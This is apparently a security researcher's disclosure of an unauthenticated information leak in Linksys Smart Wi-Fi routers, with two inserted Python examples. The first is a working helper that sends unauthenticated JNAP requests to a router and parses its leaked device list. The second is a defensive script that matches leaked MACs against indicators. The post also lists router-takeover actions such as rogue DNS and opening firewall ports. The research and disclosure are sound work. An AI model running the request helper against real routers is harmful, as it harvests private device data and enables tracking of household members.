Our honeypots frequently detect scans targeting various Home Network Administration Protocol (HNAP) endpoints. Many of these attacks aim to exploit vulnerable consumer routers. Upon further investigation, we discovered a persistent flaw in Linksys Smart Wi-Fi routers that allows an unauthenticated remote attacker to read sensitive information.
How can the vulnerability be exploited?
- Go to the Linksys Smart Wi-Fi router’s public IP address in your web browser
- Open the developer console (F12 key) and go to the Network tab
- Scroll down to the requests named JNAP (there are several) and click one to open it; the response body contains the leaked device list
The leak can also be reproduced by sending a request to this JNAP endpoint:
This sensitive information disclosure vulnerability requires no authentication and can be exploited by a remote attacker with little technical knowledge.
How many Linksys Smart Wi-Fi routers are vulnerable?
Using data provided by BinaryEdge, our scans have found 25,617 Linksys Smart Wi-Fi routers are currently leaking sensitive information to the public internet, including:
- MAC address of every device that’s ever connected to it (full historical record, not just active devices)
- Device name (such as “TROY-PC” or “Mat’s MacBook Pro”)
- Operating system (such as “Windows 7” or “Android”)
In some cases additional metadata is logged such as device type, manufacturer, model number, and description – as seen in the example below.
Other sensitive information about the router, such as its WAN settings, firewall status, firmware update settings, and DDNS settings, is also exposed to the public internet.
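The reproduction steps above end with a JSON reply in the browser's Network tab; the following is an added example (not Bad Packets' or Linksys' code) that fetches one JNAP action without credentials and flattens the device-list reply into records carrying the fields the post says are leaked. It rests on assumptions the post does not state: that JNAP calls are HTTP POSTs to /JNAP/ with the action URI in an X-JNAP-Action header and a JSON body, answered by JSON of the form {"result": ..., "output": {...}}, which is how the protocol works in my experience; the action name itself is passed in by the caller because this page does not reproduce it; and SAMPLE_REPLY, including its field names, is constructed for this example.

```python
"""Added example: unauthenticated JNAP request helper and device-list parser.

Not Bad Packets' or Linksys' code.  Assumptions (none stated on the page):
  * JNAP = POST /JNAP/ with the action URI in an X-JNAP-Action header, JSON
    body, JSON reply {"result": "...", "output": {...}}.
  * The action name is supplied by the caller (taken from the Network tab).
  * SAMPLE_REPLY and its field names are constructed for this example.
"""
import json
import urllib.request
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class LeakedDevice:
    mac: str
    name: str
    connected: bool            # seen right now, or only in the router's history
    os: Optional[str] = None
    device_type: Optional[str] = None
    manufacturer: Optional[str] = None
    model: Optional[str] = None


def jnap_request(host: str, action: str, payload: Optional[dict] = None,
                 timeout: float = 10.0) -> dict:
    """POST one JNAP action to `host` and return the decoded JSON reply.

    No authorization header is sent on purpose: the finding is that the
    router answers these actions to anyone who can reach its web interface.
    """
    req = urllib.request.Request(
        f"http://{host}/JNAP/",
        data=json.dumps(payload or {}).encode(),
        method="POST",
        headers={"Content-Type": "application/json; charset=UTF-8",
                 "X-JNAP-Action": action},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.loads(resp.read().decode())


def parse_device_list(reply: dict) -> List[LeakedDevice]:
    """One LeakedDevice per (device, MAC) pair.  MACs are lower-cased so they
    can be compared with other sources (WiGLE, indicator lists, DHCP logs)."""
    if reply.get("result") != "OK":
        raise ValueError(f"JNAP call did not succeed: {reply.get('result')!r}")
    records: List[LeakedDevice] = []
    for dev in reply.get("output", {}).get("devices", []):
        model = dev.get("model") or {}
        unit = dev.get("unit") or {}
        macs = sorted({i["macAddress"].lower() for i in dev.get("knownInterfaces", [])})
        active = bool(dev.get("connections"))   # empty list: historical entry only
        for mac in macs:
            records.append(LeakedDevice(
                mac=mac,
                name=dev.get("friendlyName", ""),
                connected=active,
                os=unit.get("operatingSystem"),
                device_type=model.get("deviceType"),
                manufacturer=model.get("manufacturer"),
                model=model.get("modelNumber"),
            ))
    return records


def summarize(records: List[LeakedDevice]) -> Dict[str, int]:
    """Counts a triage script would report for one router."""
    return {
        "macs": len({r.mac for r in records}),
        "active": sum(1 for r in records if r.connected),
        "historical": sum(1 for r in records if not r.connected),
        "named": len({r.name for r in records if r.name}),
    }


# Constructed reply: three devices, only the first currently connected.
SAMPLE_REPLY = {
    "result": "OK",
    "output": {
        "revision": 42,
        "devices": [
            {"deviceID": "dev-1", "friendlyName": "TROY-PC",
             "model": {"deviceType": "Computer", "manufacturer": "Dell", "modelNumber": "Latitude"},
             "unit": {"operatingSystem": "Windows 7"},
             "knownInterfaces": [{"macAddress": "AA:BB:CC:11:22:33", "interfaceType": "Wireless"}],
             "connections": [{"macAddress": "AA:BB:CC:11:22:33", "ipAddress": "192.168.1.23"}]},
            {"deviceID": "dev-2", "friendlyName": "Mat's MacBook Pro",
             "model": {"deviceType": "Computer"},
             "unit": {"operatingSystem": "macOS"},
             "knownInterfaces": [{"macAddress": "aa:bb:cc:44:55:67"}, {"macAddress": "aa:bb:cc:44:55:66"}],
             "connections": []},
            {"deviceID": "dev-3", "friendlyName": "android-3f1c",
             "model": {}, "unit": {"operatingSystem": "Android"},
             "knownInterfaces": [{"macAddress": "AA:BB:CC:77:88:99"}],
             "connections": []},
        ],
    },
}

if __name__ == "__main__":
    # Live use: parse_device_list(jnap_request("203.0.113.1", action_from_devtools))
    for rec in parse_device_list(SAMPLE_REPLY):
        print(rec)
    print(summarize(parse_device_list(SAMPLE_REPLY)))
```

The `connected` flag is what separates the currently associated clients from the historical record the post warns about: a device with known interfaces but no active connection has not been on the network recently, yet its MAC, name and OS are still served to anyone who asks.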
What are the risks of leaking this information publicly?
A MAC address is a unique identifier for every networked device. Mobile devices, such as smartphones and laptops, present this identifier every time they connect to a wireless network, which creates a fingerprint that can be used to track that device's movement across networks. Per-network MAC randomization, which later iOS and Android releases enable by default, weakens this tracking, but the router still records whatever address the device presented.
If a device's name includes the owner's full name, this flaw lets an attacker identify the owner and geolocate them via the Linksys Smart Wi-Fi router's public IP address.
While geolocation by IP address is imprecise, services like WiGLE allow anyone to obtain the geographic coordinates of a Wi-Fi network based solely on its MAC address (BSSID) or SSID. An attacker can query the target Linksys Smart Wi-Fi router, read its MAC address from the reply, and immediately geolocate it.
If a remote unauthenticated attacker was able to access the device name, model number, operating system, firmware version, and MAC address of everything connected to your home router (including the router itself) – how would you classify the issue?
— Bad Packets Report (@bad_packets) May 14, 2019
In any case, publicly leaking the historical record of every device that has ever connected to the Linksys Smart Wi-Fi router is a privacy concern that should not be taken lightly. This information gives attackers visibility inside your home or business network, enabling targeted attacks against the devices it lists.
Is there any connection to the ShadowHammer attacks?
Of the 756,565 unique MAC addresses currently being leaked, only two were referenced in the ShadowHammer attacks, and it is unlikely that either was targeted directly. The first match, 0c:5b:8f:27:9a:64, appears to be frequently reused by Huawei, so it does not identify a single device. The second, 00:50:56:c0:00:08, is the VMware default and was targeted only when it appeared together with a specific secondary MAC address.
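The comparison above is a set intersection with two caveats: an indicator that is a VMware default or that shows up behind many unrelated routers is a weak identifier, and one indicator only counts when a second MAC is present on the same router. The following is an added example (not from the Bad Packets post) that normalises leaked MACs, measures how many routers each one appears behind, and applies both caveats. The two indicator MACs are the ones quoted in the post; the "paired" MAC de:ad:be:ef:00:01, the reuse threshold and the router dataset are constructed for this example.

```python
"""Added example: match leaked MAC addresses against an indicator list.

Not from the Bad Packets post.  The two indicator MACs are quoted in the post;
the paired MAC, the reuse threshold and SAMPLE_ROUTERS are constructed.
"""
import re
from typing import Dict, Iterable, List, Optional, Tuple

_NON_HEX = re.compile(r"[^0-9a-f]")

# OUIs registered to VMware, used to flag virtual adapters (public IEEE data).
VMWARE_OUIS = {"00:50:56", "00:0c:29", "00:05:69"}

# indicator MAC -> MAC that must also be present for the indicator to count
INDICATORS: Dict[str, Optional[str]] = {
    "0c:5b:8f:27:9a:64": None,                 # quoted in the post (Huawei reuse)
    "00:50:56:c0:00:08": "de:ad:be:ef:00:01",  # VMware default; pair MAC is constructed
}


def normalize_mac(mac: str) -> str:
    """Accept aa:bb:cc:dd:ee:ff, AA-BB-CC-DD-EE-FF, aabb.ccdd.eeff or aabbccddeeff."""
    digits = _NON_HEX.sub("", mac.lower())
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def mac_prevalence(routers: Dict[str, Iterable[str]]) -> Dict[str, int]:
    """Number of distinct routers each MAC was seen behind.  A 'unique' hardware
    address that appears behind many unrelated routers is reused or virtual."""
    seen: Dict[str, int] = {}
    for leaked in routers.values():
        for mac in {normalize_mac(m) for m in leaked}:
            seen[mac] = seen.get(mac, 0) + 1
    return seen


def triage(routers: Dict[str, Iterable[str]],
           indicators: Dict[str, Optional[str]] = INDICATORS,
           reuse_threshold: int = 3) -> List[Tuple[str, str, str]]:
    """(router, indicator, verdict) for every indicator seen behind any router.

    verdicts: pair-missing   indicator present, required second MAC absent
              reused         seen behind >= reuse_threshold routers, weak identifier
              match-virtual  matched, but the OUI belongs to VMware
              match          matched with no caveat
    """
    prevalence = mac_prevalence(routers)
    results: List[Tuple[str, str, str]] = []
    for router, leaked in routers.items():
        macs = {normalize_mac(m) for m in leaked}
        for ioc, pair in indicators.items():
            ioc = normalize_mac(ioc)
            if ioc not in macs:
                continue
            if pair is not None and normalize_mac(pair) not in macs:
                verdict = "pair-missing"
            elif prevalence[ioc] >= reuse_threshold:
                verdict = "reused"
            elif ioc[:8] in VMWARE_OUIS:
                verdict = "match-virtual"
            else:
                verdict = "match"
            results.append((router, ioc, verdict))
    return results


# Constructed dataset: router public IP (RFC 5737 range) -> leaked MACs, in the
# mixed notations a scraped device list or spreadsheet tends to contain.
SAMPLE_ROUTERS: Dict[str, List[str]] = {
    "203.0.113.10": ["0C-5B-8F-27-9A-64", "aa:bb:cc:00:00:01"],
    "203.0.113.11": ["0c5b8f279a64", "aa:bb:cc:00:00:02"],
    "203.0.113.12": ["0c5b.8f27.9a64"],
    "203.0.113.13": ["00:50:56:c0:00:08", "aa:bb:cc:00:00:03"],
    "203.0.113.14": ["00:50:56:C0:00:08", "de:ad:be:ef:00:01"],
}

if __name__ == "__main__":
    for router, ioc, verdict in triage(SAMPLE_ROUTERS):
        print(f"{router:14} {ioc}  {verdict}")
```

With the sample data the Huawei-reused address is reported as `reused` because it appears behind three routers, the VMware default on its own is `pair-missing`, and only the router that also carries the paired address produces a match, which is still flagged `match-virtual` because the OUI is VMware's.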
Did you find the German mail bomber?
The MAC address used by the German mail bomber (f8:e0:79:af:57:eb) was not found.
What is Home Network Administration Protocol (HNAP)?
HNAP is a SOAP-based protocol used to manage and configure consumer routers. Cisco acquired and took over development of the protocol in 2009. Numerous HNAP-related vulnerabilities have been identified in the last six years, and large-scale exploitation of HNAP flaws by the "TheMoon" botnet was discovered by security researchers in 2014. The JNAP calls discussed above are the JSON-over-HTTP variant that Linksys Smart Wi-Fi firmware uses for the same management purpose.
Are there other HNAP vulnerabilities?
Yes. An unauthenticated attacker can quickly enumerate which Linksys Smart Wi-Fi routers still use the default password (admin) without attempting to log in to the device at all. This can be done by simply querying the following JNAP endpoint:
Our scans have found thousands of routers are still using the default password and are vulnerable to immediate takeover – if they aren’t already compromised.
Admin access to the Linksys Smart Wi-Fi router allows attackers to:
- Obtain the SSID and Wi-Fi password in plaintext
- Change the DNS settings to use a rogue DNS server to hijack web traffic
- Open ports in the router's firewall to directly target devices behind the router (for example, 3389/tcp for Windows RDP)
- Use UPnP to redirect outgoing traffic to the threat actors’ device
- Create an OpenVPN account (supported models) to route malicious traffic through the router
- Disable the router’s internet connection or modify other settings in a destructive manner
What specific models of Linksys Smart Wi-Fi routers are vulnerable?
Our research has found the models listed below are actively leaking sensitive information, including those running the latest firmware available from Linksys.
The full list of vulnerable models and firmware versions is available here.
Where are the vulnerable routers located?
This interactive map shows the total vulnerable Linksys Smart Wi-Fi routers found per country.
Overall, a grand total of 25,617 vulnerable routers were found in 146 countries and on the network of 1,998 unique autonomous systems (internet service providers).
Wasn’t this issue patched five years ago?
While CVE-2014-8244 was previously patched for this issue, our findings indicate otherwise under three conditions: the user has disabled the router's firewall, the user has configured the router in bridge mode, or a UPnP IGD tool has been used to open ports directly to the router. Upon contacting the Linksys security team we were advised to report the vulnerability via their reporting form. After we submitted our findings, the reviewing analyst rated the issue "Not applicable / Won't fix" and closed the report.
Is there any good news?
Over half of the vulnerable Linksys Smart Wi-Fi routers (14,387) currently have automatic firmware updates enabled. If Linksys eventually patches this vulnerability, these routers will be protected automatically.
Due to the sensitive nature of this vulnerability, the IP addresses of the affected Linksys Smart Wi-Fi routers will not be published publicly.
Unfortunately, our typical recommendation of keeping your router’s firmware up-to-date is not applicable in this case as no fix is available. Linksys Smart Wi-Fi routers have remote access enabled by default, as it’s required for the Linksys App to function, and cannot be turned off as a workaround. However, most (but not all) models have the option of using third-party firmware, such as OpenWrt, that can disable remote access and prevent the leak of sensitive information.
After this article was published, Linksys (Belkin) reached out to Bad Packets requesting further details about the BinaryEdge searches and data analysis. Belkin was able to identify additional configurations under which these routers become vulnerable remotely. Belkin has also committed to enhancing the security of its routers with future firmware updates that will prevent the UPnP IGD protocol from opening ports directly to the router and ensure that all sensitive JNAP calls are secured.
Despite this, Belkin has still publicly denied that the vulnerability exists, while quietly patching its flagship Linksys WHW03 router against the issue five months later (release note snippet shown below). Sadly, many other Linksys router models remain vulnerable to this day.
---------------------------------------------------------------------------
Firmware version: 18.104.22.168735
Release date: Nov 21, 2019
- Addressed security concerns submitted by Bad Packets (special thanks to Troy)